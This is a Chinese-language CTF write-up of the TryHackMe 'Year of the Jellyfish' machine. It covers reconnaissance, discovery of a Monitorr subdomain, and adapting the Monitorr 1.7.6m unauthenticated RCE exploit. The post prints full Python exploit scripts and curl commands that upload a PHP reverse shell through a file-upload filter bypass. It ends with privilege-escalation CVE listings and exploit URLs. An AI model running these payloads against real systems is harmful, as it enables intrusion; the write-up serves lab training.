[THM] Year of the Jellyfish

First Post:

2023-06-04

Last Update:

2023-06-04

Word Count:

6.8k

Read Time:

37 min

daxiaofeng

前言

这台机子是tryhackme上的Year of the Jellyfish靶机，难度是hard，确实有点难度。信息收集的第一步就要避开很多兔子洞，以及要懂得看ssl证书信息。web渗透部分要有调整exp的能力，毕竟很多exp并不能拿上来就能成功利用，得自己调试修改。提权部分就主要是内核提权没什么说的。

信息收集

端口扫描

root@ip-10-10-242-231:~# sudo nmap -p- --min-rate 10000 34.240.221.73

Starting Nmap 7.60 ( https://nmap.org ) at 2023-06-03 15:40 BST
Nmap scan report for ec2-34-240-221-73.eu-west-1.compute.amazonaws.com (34.240.221.73)
Host is up (0.00050s latency).
Not shown: 65528 filtered ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
443/tcp   open  https
8000/tcp  open  http-alt
8096/tcp  open  unknown
22222/tcp open  easyengine

Nmap done: 1 IP address (1 host up) scanned in 20.29 seconds

tcp扫描，服务探测，系统识别

root@ip-10-10-242-231:~# sudo nmap -sT -sV -O -sC -p21,22,80,443,8000,8096,22222 34.240.221.73

Starting Nmap 7.60 ( https://nmap.org ) at 2023-06-03 15:43 BST
Nmap scan report for ec2-34-240-221-73.eu-west-1.compute.amazonaws.com (34.240.221.73)
Host is up (0.00063s latency).

PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 3.0.3
22/tcp    open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|_  2048 46:b2:81:be:e0:bc:a7:86:39:39:82:5b:bf:e5:65:58 (RSA)
80/tcp    open  http     Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Did not follow redirect to https://robyns-petshop.thm/
443/tcp   open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Robyn&#039;s Pet Shop
| ssl-cert: Subject: commonName=robyns-petshop.thm/organizationName=Robyns Petshop/stateOrProvinceName=South West/countryName=GB
| Subject Alternative Name: DNS:robyns-petshop.thm, DNS:monitorr.robyns-petshop.thm, DNS:beta.robyns-petshop.thm, DNS:dev.robyns-petshop.thm
| Not valid before: 2023-06-03T14:34:57
|_Not valid after:  2024-06-02T14:34:57
|_ssl-date: TLS randomness does not represent time
8000/tcp  open  http-alt
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Content-Length: 15
|_    Request
|_http-title: Under Development!
8096/tcp  open  unknown
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Connection: close
|     Date: Sat, 03 Jun 2023 14:43:59 GMT
|     Server: Kestrel
|     Content-Length: 0
|     X-Response-Time-ms: 210
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Date: Sat, 03 Jun 2023 14:43:34 GMT
|     Server: Kestrel
|     Content-Length: 0
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 302 Found
|     Connection: close
|     Date: Sat, 03 Jun 2023 14:43:34 GMT
|     Server: Kestrel
|     Content-Length: 0
|     Location: /web/index.html
|   Help, Kerberos, SSLSessionReq, TLSSessionReq: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Date: Sat, 03 Jun 2023 14:43:49 GMT
|     Server: Kestrel
|     Content-Length: 0
|   LDAPSearchReq, LPDString: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Date: Sat, 03 Jun 2023 14:43:59 GMT
|     Server: Kestrel
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 505 HTTP Version Not Supported
|     Connection: close
|     Date: Sat, 03 Jun 2023 14:43:34 GMT
|     Server: Kestrel
|_    Content-Length: 0
22222/tcp open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8d:99:92:52:8e:73:ed:91:01:d3:a7:a0:87:37:f0:4f (RSA)
|   256 5a:c0:cc:a1:a8:79:eb:fd:6f:cf:f8:78:0d:2f:5d:db (ECDSA)
|_  256 0a:ca:b8:39:4e:ca:e3:cf:86:5c:88:b9:2e:25:7a:1b (EdDSA)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8000-TCP:V=7.60%I=7%D=6/3%Time=647B519B%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,3F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Length:\x20
SF:15\r\n\r\n400\x20Bad\x20Request");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8096-TCP:V=7.60%I=7%D=6/3%Time=647B5196%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,78,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20clos
SF:e\r\nDate:\x20Sat,\x2003\x20Jun\x202023\x2014:43:34\x20GMT\r\nServer:\x
SF:20Kestrel\r\nContent-Length:\x200\r\n\r\n")%r(GetRequest,8D,"HTTP/1\.1\
SF:x20302\x20Found\r\nConnection:\x20close\r\nDate:\x20Sat,\x2003\x20Jun\x
SF:202023\x2014:43:34\x20GMT\r\nServer:\x20Kestrel\r\nContent-Length:\x200
SF:\r\nLocation:\x20/web/index\.html\r\n\r\n")%r(HTTPOptions,8D,"HTTP/1\.1
SF:\x20302\x20Found\r\nConnection:\x20close\r\nDate:\x20Sat,\x2003\x20Jun\
SF:x202023\x2014:43:34\x20GMT\r\nServer:\x20Kestrel\r\nContent-Length:\x20
SF:0\r\nLocation:\x20/web/index\.html\r\n\r\n")%r(RTSPRequest,87,"HTTP/1\.
SF:1\x20505\x20HTTP\x20Version\x20Not\x20Supported\r\nConnection:\x20close
SF:\r\nDate:\x20Sat,\x2003\x20Jun\x202023\x2014:43:34\x20GMT\r\nServer:\x2
SF:0Kestrel\r\nContent-Length:\x200\r\n\r\n")%r(Help,78,"HTTP/1\.1\x20400\
SF:x20Bad\x20Request\r\nConnection:\x20close\r\nDate:\x20Sat,\x2003\x20Jun
SF:\x202023\x2014:43:49\x20GMT\r\nServer:\x20Kestrel\r\nContent-Length:\x2
SF:00\r\n\r\n")%r(SSLSessionReq,78,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
SF:Connection:\x20close\r\nDate:\x20Sat,\x2003\x20Jun\x202023\x2014:43:49\
SF:x20GMT\r\nServer:\x20Kestrel\r\nContent-Length:\x200\r\n\r\n")%r(TLSSes
SF:sionReq,78,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\
SF:r\nDate:\x20Sat,\x2003\x20Jun\x202023\x2014:43:49\x20GMT\r\nServer:\x20
SF:Kestrel\r\nContent-Length:\x200\r\n\r\n")%r(Kerberos,78,"HTTP/1\.1\x204
SF:00\x20Bad\x20Request\r\nConnection:\x20close\r\nDate:\x20Sat,\x2003\x20
SF:Jun\x202023\x2014:43:49\x20GMT\r\nServer:\x20Kestrel\r\nContent-Length:
SF:\x200\r\n\r\n")%r(FourOhFourRequest,8F,"HTTP/1\.1\x20404\x20Not\x20Foun
SF:d\r\nConnection:\x20close\r\nDate:\x20Sat,\x2003\x20Jun\x202023\x2014:4
SF:3:59\x20GMT\r\nServer:\x20Kestrel\r\nContent-Length:\x200\r\nX-Response
SF:-Time-ms:\x20210\r\n\r\n")%r(LPDString,78,"HTTP/1\.1\x20400\x20Bad\x20R
SF:equest\r\nConnection:\x20close\r\nDate:\x20Sat,\x2003\x20Jun\x202023\x2
SF:014:43:59\x20GMT\r\nServer:\x20Kestrel\r\nContent-Length:\x200\r\n\r\n"
SF:)%r(LDAPSearchReq,78,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:
SF:\x20close\r\nDate:\x20Sat,\x2003\x20Jun\x202023\x2014:43:59\x20GMT\r\nS
SF:erver:\x20Kestrel\r\nContent-Length:\x200\r\n\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (93%), Linux 3.10 (93%), Linux 3.10 - 4.8 (93%), Linux 3.2 - 4.8 (93%), Linux 3.4 - 3.10 (93%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Synology DiskStation Manager 5.2-5644 (91%), Linux 2.6.22 - 2.6.36 (89%), Linux 2.6.39 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: robyns-petshop.thm; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.96 seconds

可以发现信息很多（实际上很多兔子洞），目前来看主要方向： 21端口ftp看看有无匿名登录；80和443就不用说了web渗透；8000和8096端口不知道干吗的之后看看；22和22222都是ssh端口。

先漏扫一下吧。

root@ip-10-10-242-231:~# sudo nmap --script=vuln 34.240.221.73

Starting Nmap 7.60 ( https://nmap.org ) at 2023-06-03 15:46 BST
Nmap scan report for ec2-34-240-221-73.eu-west-1.compute.amazonaws.com (34.240.221.73)
Host is up (0.00051s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
|_sslv2-drown: 
22/tcp   open  ssh
80/tcp   open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
443/tcp  open  https
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /.gitignore: Revision control ignore file
|   /config/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /content/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /themes/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_  /vendor/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
8000/tcp open  http-alt
| http-litespeed-sourcecode-download: 
| Litespeed Web Server Source Code Disclosure (CVE-2010-2333)
| /index.php source code:
|_<html lang=\"en\"><head><title>Under Development!</title><meta charset=\"utf-8\"><meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\"></head><body><h1>Under Construction</h1><h2>This site is under development. Please be patient.</h2><p>If you have been given a specific ID to use when accessing this development site, please put it at the end of the url (e.g. ec2-34-240-221-73.eu-west-1.compute.amazonaws.com:8000/ID_HERE)</body></html>
|_http-vuln-cve2013-7091: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 53.23 seconds

root@ip-10-10-242-231:~# sudo nikto -h 34.240.221.73
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          34.240.221.73
+ Target Hostname:    34.240.221.73
+ Target Port:        80
+ Start Time:         2023-06-03 15:51:35 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ Root page / redirects to: https://robyns-petshop.thm/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3931: /myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=: myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3931: /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent: myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ 6544 items checked: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2023-06-03 15:51:46 (GMT1) (11 seconds)
---------------------------------------------------------------------------

发现列举出了一下目录以及发现网页会重定向至https://robyns-petshop.thm/，我们把其和ip对应加到`/etc/hosts`中，不然会出现无法访问的问题。

再dirb目录发现一下。

root@ip-10-10-242-231:~# sudo dirb https://34.240.221.73

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jun  3 15:55:12 2023
URL_BASE: https://34.240.221.73/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: https://34.240.221.73/ ----
==> DIRECTORY: https://34.240.221.73/assets/                                                                                                                                                                                                                                             
+ https://34.240.221.73/business (CODE:401|SIZE:461)                                                                                                                                                                                                                                     
==> DIRECTORY: https://34.240.221.73/config/                                                                                                                                                                                                                                             
==> DIRECTORY: https://34.240.221.73/content/                                                                                                                                                                                                                                            
+ https://34.240.221.73/index.php (CODE:200|SIZE:3631)                                                                                                                                                                                                                                   
+ https://34.240.221.73/LICENSE (CODE:200|SIZE:1085)                                                                                                                                                                                                                                     
==> DIRECTORY: https://34.240.221.73/plugins/                                                                                                                                                                                                                                            
+ https://34.240.221.73/server-status (CODE:403|SIZE:279)                                                                                                                                                                                                                                
==> DIRECTORY: https://34.240.221.73/themes/                                                                                                                                                                                                                                             
==> DIRECTORY: https://34.240.221.73/vendor/                                 


---- Entering directory: https://34.240.221.73/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                                                         
---- Entering directory: https://34.240.221.73/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                                                         
---- Entering directory: https://34.240.221.73/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                                                         
---- Entering directory: https://34.240.221.73/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                                                         
---- Entering directory: https://34.240.221.73/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                                                         
---- Entering directory: https://34.240.221.73/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sat Jun  3 15:55:16 2023
DOWNLOADED: 4612 - FOUND: 4

发现能发现一些目录，点进去也确实能看到目录中的文件。

渗透

信息收集完，每条路都依次试试吧。

ftp

ftp尝试匿名登录，发现登不进去，直接放弃吧。

web

web这边还挺花的。

80和443端口下是一个用PicoCMS搭的网站（在网站底部可以看到是Pico搭的）。

homepage

然而除了主页和contact页面以外没有别的其他信息了。当然可以通过之前目录发现的目录查看到一些文件，但总体来说也就能看出PicoCMS的版本，其他信息不是很有帮助。

8000端口是一个说是在开发中的站点，访问需要提供授权id，随意输了几个类似root，admin，robyn等id都没能成功访问，索性先不看了。

rabbithole2

8096端口上了就是一个登录页面，尝试了几个弱密码都没成功，点击忘记密码说明是需要内部网络环境才能激活忘记密码的流程，暂时没有什么好的利用方式。也先过吧。

rabbithole

兜兜转转回到80端口的网站处，先是在exp-db上（Attack Box 的 searchspolit不知道为啥有点问题）搜了一下PicoCMS上相关的漏洞，发现有个文件包含的漏洞，尝试了一下没有成功，可能是版本的原因，毕竟那个漏洞的pico版本比较老。

这部分陷入了僵局，没办法了，去网上搜了下相关的workthrough，发现我遗漏了收集ssl证书信息这一步。

确实，ssl连接浏览器一直提示有问题，是该想到去看看的，我们直接在浏览器查看网站的证书信息。

ssl_certificate

我们可以发现SAN里面的DNS Name还包含了其他几个域名，我们把它们加入hosts中访问看看。

vim-etc-hosts

我们可以发现beta和dev开头的都会指向初始的网页。而monitorr开头的网页则指向了一个新的网站。

monitor

monitorr漏洞利用

从网页的底部我们可以看这个Monitorr是一个github上的开源项目，我们点进去查看可以发现其是用于管理PHP网页的。我们点击底下的Monitorr Setting会进入到管理页面。

monitorr-seting

然而需要登录，简单的弱密码也登陆不了。

不过Monitorr本身有没有漏洞可以利用呢，我们直接去exp-db上查一下，发现还真有。

seacrh-mon

我们直接试试第二个，因为远程代码执行通常意味着拿shell。

下载脚本下来运行：

root@ip-10-10-242-231:~# python3 48980.py https://monitorr.robyns-petshop.thm 10.10.242.231 443
Traceback (most recent call last):
  File "/usr/local/lib/python3.6/dist-packages/urllib3-1.26.12-py3.6.egg/urllib3/connectionpool.py", line 710, in urlopen
    chunked=chunked,
  File "/usr/local/lib/python3.6/dist-packages/urllib3-1.26.12-py3.6.egg/urllib3/connectionpool.py", line 386, in _make_request
    self._validate_conn(conn)
  File "/usr/local/lib/python3.6/dist-packages/urllib3-1.26.12-py3.6.egg/urllib3/connectionpool.py", line 1042, in _validate_conn
    conn.connect()
  File "/usr/local/lib/python3.6/dist-packages/urllib3-1.26.12-py3.6.egg/urllib3/connection.py", line 424, in connect
    tls_in_tls=tls_in_tls,
  File "/usr/local/lib/python3.6/dist-packages/urllib3-1.26.12-py3.6.egg/urllib3/util/ssl_.py", line 450, in ssl_wrap_socket
    sock, context, tls_in_tls, server_hostname=server_hostname
  File "/usr/local/lib/python3.6/dist-packages/urllib3-1.26.12-py3.6.egg/urllib3/util/ssl_.py", line 493, in _ssl_wrap_socket_impl
    return ssl_context.wrap_socket(sock, server_hostname=server_hostname)
  File "/usr/lib/python3.6/ssl.py", line 407, in wrap_socket
    _context=self, _session=session)
  File "/usr/lib/python3.6/ssl.py", line 817, in __init__
    self.do_handshake()
  File "/usr/lib/python3.6/ssl.py", line 1077, in do_handshake
    self._sslobj.do_handshake()
  File "/usr/lib/python3.6/ssl.py", line 689, in do_handshake
    self._sslobj.do_handshake()
ssl.SSLError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:852)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.6/dist-packages/requests-2.28.1-py3.6.egg/requests/adapters.py", line 499, in send
    timeout=timeout,
  File "/usr/local/lib/python3.6/dist-packages/urllib3-1.26.12-py3.6.egg/urllib3/connectionpool.py", line 788, in urlopen
    method, url, error=e, _pool=self, _stacktrace=sys.exc_info()[2]
  File "/usr/local/lib/python3.6/dist-packages/urllib3-1.26.12-py3.6.egg/urllib3/util/retry.py", line 592, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='monitorr.robyns-petshop.thm', port=443): Max retries exceeded with url: /assets/php/upload.php (Caused by SSLError(SSLError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:852)'),))

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "48980.py", line 26, in <module>
    requests.post(url, headers=headers, data=data)
  File "/usr/local/lib/python3.6/dist-packages/requests-2.28.1-py3.6.egg/requests/api.py", line 115, in post
    return request("post", url, data=data, json=json, **kwargs)
  File "/usr/local/lib/python3.6/dist-packages/requests-2.28.1-py3.6.egg/requests/api.py", line 59, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/local/lib/python3.6/dist-packages/requests-2.28.1-py3.6.egg/requests/sessions.py", line 587, in request
    resp = self.send(prep, **send_kwargs)
  File "/usr/local/lib/python3.6/dist-packages/requests-2.28.1-py3.6.egg/requests/sessions.py", line 701, in send
    r = adapter.send(request, **kwargs)
  File "/usr/local/lib/python3.6/dist-packages/requests-2.28.1-py3.6.egg/requests/adapters.py", line 563, in send
    raise SSLError(e, request=request)
requests.exceptions.SSLError: HTTPSConnectionPool(host='monitorr.robyns-petshop.thm', port=443): Max retries exceeded with url: /assets/php/upload.php (Caused by SSLError(SSLError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:852)'),))

然而直接报错，错误说是ssl证书验证失败，我们直接把错误信息丢到搜索引擎查一下，发现只要把python里request请求的verify设置为False以及设置全局证书验证关闭即可，那我们改一下试一试：

#!/usr/bin/python
# -*- coding: UTF-8 -*-

# Exploit Title: Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)
# Date: September 12, 2020
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
# Software Link: https://github.com/Monitorr/Monitorr
# Version: 1.7.6m
# Tested on: Ubuntu 19

import requests
import os
import sys
import ssl
# 关闭全局证书验证
ssl._create_default_https_context = ssl._create_unverified_context

if len (sys.argv) != 4:
        print ("specify params in format: python " + sys.argv[0] + " target_url lhost lport")
else:
    url = sys.argv[1] + "/assets/php/upload.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/plain, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------31046105003900160576454225745", "Origin": sys.argv[1], "Connection": "close", "Referer": sys.argv[1]}

    data = "-----------------------------31046105003900160576454225745\r\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"she_ll.php\"\r\nContent-Type: image/gif\r\n\r\nGIF89a213213123<?php shell_exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"+sys.argv[2] +"/" + sys.argv[3] + " 0>&1'\");\r\n\r\n-----------------------------31046105003900160576454225745--\r\n"
	#request验证关闭
    requests.post(url, headers=headers, data=data, verify=False)

    print ("A shell script should be uploaded. Now we try to execute it")
    url = sys.argv[1] + "/assets/data/usrimg/she_ll.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
    #request验证关闭
    requests.get(url, headers=headers, verify=False)

开启nc监听并再次尝试运行exp发现并没有收到反弹shell，虽然提示是成功了。我们根据代码地址在/assets/data/usrimg/路径下只发现了一个usrimg.png，说明我们的反弹shell并没能成功传上去。

我们再细看下代码，发现他是利用了/assets/php/upload.php传图片到服务器上的，相当于利用了文件上传漏洞。我们直接访问下该网址发现有什么返回。

upload-pos

发现报错了，错误信息提示不是图片或超过最大上传大小限制。

那我们尝试一下用curl调试一下看看上传到底是哪里出了问题吧。我们根据exp里的上传部分构造一下curl的上传语句。

root@ip-10-10-242-231:~# curl -F "fileToUpload=@test.png" https://monitorr.robyns-petshop.thm/assets/php/upload.php
curl: (60) SSL certificate problem: unable to get local issuer certificate
More details here: https://curl.haxx.se/docs/sslcerts.html

curl failed to verify the legitimacy of the server and therefore could not
establish a secure connection to it. To learn more about this situation and
how to fix it, please visit the web page mentioned above.

错误信息查了一下还是ssl证书的问题，只要加上-k跳过 SSL 检测就可以了。

1
2

root@ip-10-10-242-231:~# curl -k -F "fileToUpload=@test.png" https://monitorr.robyns-petshop.thm/assets/php/upload.php
<div id='uploadreturn'>You are an exploit.</div><div id='uploaderror'>ERROR: test.png was not uploaded.</div></div>

发现又有新问题。他说我们是在exploit。很奇怪，直接访问也没显示这个错误啊。其次我这test.png就是一张图片，也不是php一句话木马，为啥会说我在exploit。

我们回到upload.php网页用F12查看一下请求信息，看看是不是漏了什么。

no-error

细看一下请求里面有cookie，内容是isHuman和PHPSESSID，难道是我们没有cookie被认为是构造的攻击？

那我们就把cookie内容复制过来再试试。

1
2

root@ip-10-10-242-231:~# curl -k -F "fileToUpload=@test.png" https://monitorr.robyns-petshop.thm/assets/php/upload.php -H "cookie: isHuman=1, PHPSESSID=gahu52u8e4u03qgav5hhvvku97"
<div id='uploadreturn'>File test.png is an image: <br><div id='uploadok'>File test.png has been uploaded to: ../data/usrimg/test.png</div></div>

发现成功传上去。

那我们构造一下我们的反弹shell，内容可以直接抄exp里面的部分GIF89a213213123<?php shell_exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.242.231/8080 0>&1'");?>这样有个gif的文件头应该不会被识别出来，然而并不行，在我们尝试了双后缀和PHP大写后才成功完成上传。

1
2
3

root@ip-10-10-242-231:~# vim shell.png.PHP 
root@ip-10-10-242-231:~# curl -k -F "fileToUpload=@shell.png.PHP" https://monitorr.robyns-petshop.thm/assets/php/upload.php -H "cookie: isHuman=1, PHPSESSID=gahu52u8e4u03qgav5hhvvku97"
<div id='uploadreturn'>File shell.png.PHP is an image: <br><div id='uploadok'>File shell.png.PHP has been uploaded to: ../data/usrimg/shell.png.php<

我们直接请求上传后的地址

1	`root@ip-10-10-242-231:~# curl -k https://monitorr.robyns-petshop.thm/assets/data/usrimg/shell.png.php`

成功拿到shell。

修改exp

当然我们测试出上传失败的原因后也可以直接修改一下exp让其能成功利用：

#!/usr/bin/python
# -*- coding: UTF-8 -*-

# Exploit Title: Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)
# Date: September 12, 2020
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
# Software Link: https://github.com/Monitorr/Monitorr
# Version: 1.7.6m
# Tested on: Ubuntu 19

import requests
import os
import sys
import ssl

#关掉ssl证书验证
ssl._create_default_https_context = ssl._create_unverified_context

if len (sys.argv) != 4:
        print ("specify params in format: python " + sys.argv[0] + " target_url lhost lport")
else:
    url = sys.argv[1] + "/assets/php/upload.php"
    # headers中加入cookie
    headers = {"cookie": "isHuman=1; PHPSESSID=gahu52u8e4u03qgav5hhvvku97", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/plain, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------31046105003900160576454225745", "Origin": sys.argv[1], "Connection": "close", "Referer": sys.argv[1]}
	# 把上传文件的名字改成双后缀并大写PHP绕过文件过滤
    data = "-----------------------------31046105003900160576454225745\r\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"she_ll.gif.PHP\"\r\nContent-Type: image/gif\r\n\r\nGIF89a213213123<?php shell_exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"+sys.argv[2] +"/" + sys.argv[3] + " 0>&1'\");\r\n\r\n-----------------------------31046105003900160576454225745--\r\n"
	
    requests.post(url, headers=headers, data=data, verify=False)#关掉ssl证书验证

    print ("A shell script should be uploaded. Now we try to execute it")
    url = sys.argv[1] + "/assets/data/usrimg/she_ll.gif.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}

    requests.get(url, headers=headers, verify=False)#关掉ssl证书验证

也能成功拿shell。

after-change

user flag就在/var/www下，忘记截图了，自己看一下就好。

提权

登进来sudo -l和查找SUID位文件都没发现有用的，定时任务也没啥可以用的。手动遍历了下文件也没有什么信息。

直接上linpeas把。

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2018-18955] subuid_shell

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
   Exposure: probable
   Tags: [ ubuntu=18.04 ]{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28}
   Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip
   Comments: CONFIG_USER_NS needs to be enabled

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
